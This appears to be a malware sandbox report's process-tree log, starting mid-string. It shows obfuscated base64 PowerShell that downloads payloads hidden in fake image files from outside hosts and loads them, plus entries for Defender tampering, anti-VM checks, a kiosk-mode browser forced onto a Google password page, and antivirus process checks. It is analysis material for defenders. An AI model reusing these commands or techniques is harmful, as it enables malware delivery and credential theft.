g@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=x64&rid=win7-x64&apphost_version=6.0.16&gui=true5⤵
- System Time Discovery
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1876 CREDAT:275457 /prefetch:26⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148390101\6757fa68cc.exe"C:\Users\Admin\AppData\Local\Temp\10148390101\6757fa68cc.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2164 -s 12045⤵
- Loads dropped DLL
- Program crash
PID:1608
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148400101\84a6344dd6.exe"C:\Users\Admin\AppData\Local\Temp\10148400101\84a6344dd6.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:988
-
-
C:\Users\Admin\AppData\Local\Temp\10148410101\c4e478285d.exe"C:\Users\Admin\AppData\Local\Temp\10148410101\c4e478285d.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:2072
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1788 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.0.235563576\183715827" -parentBuildID 20221007134813 -prefsHandle 1236 -prefMapHandle 1228 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0f67e03-a0be-407a-bda5-d30d3c976bf9} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1324 100d7458 gpu7⤵PID:2444
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.1.284644514\43948292" -parentBuildID 20221007134813 -prefsHandle 1532 -prefMapHandle 1516 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7e9d282-59c0-45e5-adcc-5fa2297e167b} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1544 41eee58 socket7⤵PID:948
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.2.761947099\1186747694" -childID 1 -isForBrowser -prefsHandle 2024 -prefMapHandle 2020 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54f4046b-ec6c-4ccd-ab71-0e23fa801969} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 2036 1005f358 tab7⤵PID:388
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.3.1148181636\1392704372" -childID 2 -isForBrowser -prefsHandle 2984 -prefMapHandle 2980 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66a9c4d8-c857-46e0-b161-1ec4aa3d49f0} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 2996 1d2a5758 tab7⤵PID:2724
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.4.1493679881\420308538" -childID 3 -isForBrowser -prefsHandle 3788 -prefMapHandle 3784 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d39f4fcf-9d13-46a7-ad00-95c28aa1e5d6} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3768 1f662558 tab7⤵PID:1056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.5.1251815999\1825721517" -childID 4 -isForBrowser -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9e32c77-9668-4279-9cc8-3156c6bf5f46} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3896 1f660d58 tab7⤵PID:1820
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.6.1093573914\1133859211" -childID 5 -isForBrowser -prefsHandle 3976 -prefMapHandle 3920 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fbe4c94c-dd7f-4dad-b3b8-95a4405cc622} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3964 1f661658 tab7⤵PID:1948
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148420101\eb8fc3faf3.exe"C:\Users\Admin\AppData\Local\Temp\10148420101\eb8fc3faf3.exe"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
-
C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe"C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3824 -
C:\Windows\system32\cmd.execmd.exe /c 67cc62a429f2f.vbs5⤵PID:3856
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"6⤵PID:4008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148470101\ReK7Ewx.exe"C:\Users\Admin\AppData\Local\Temp\10148470101\ReK7Ewx.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3452 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3576 -
C:\Windows\SysWOW64\expand.exeexpand Ae.msi Ae.msi.bat6⤵
- System Location Discovery: System Language Discovery
PID:3596
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3660
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵
- System Location Discovery: System Language Discovery
PID:3668
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:2976
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7899196⤵
- System Location Discovery: System Language Discovery
PID:3008
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Deviation.msi6⤵
- System Location Discovery: System Language Discovery
PID:2352
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Brian" Challenges6⤵
- System Location Discovery: System Language Discovery
PID:3412
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com6⤵
- System Location Discovery: System Language Discovery
PID:3260
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q6⤵
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Users\Admin\AppData\Local\Temp\789919\Occupation.comOccupation.com q6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3764 -
C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe7⤵PID:3524
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:3780
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148480101\yUI6F6C.exe"C:\Users\Admin\AppData\Local\Temp\10148480101\yUI6F6C.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3924 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 11965⤵
- Loads dropped DLL
- Program crash
PID:3828
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148490101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10148490101\ADFoyxP.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1460 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3656 -
C:\Windows\SysWOW64\expand.exeexpand Go.pub Go.pub.bat6⤵
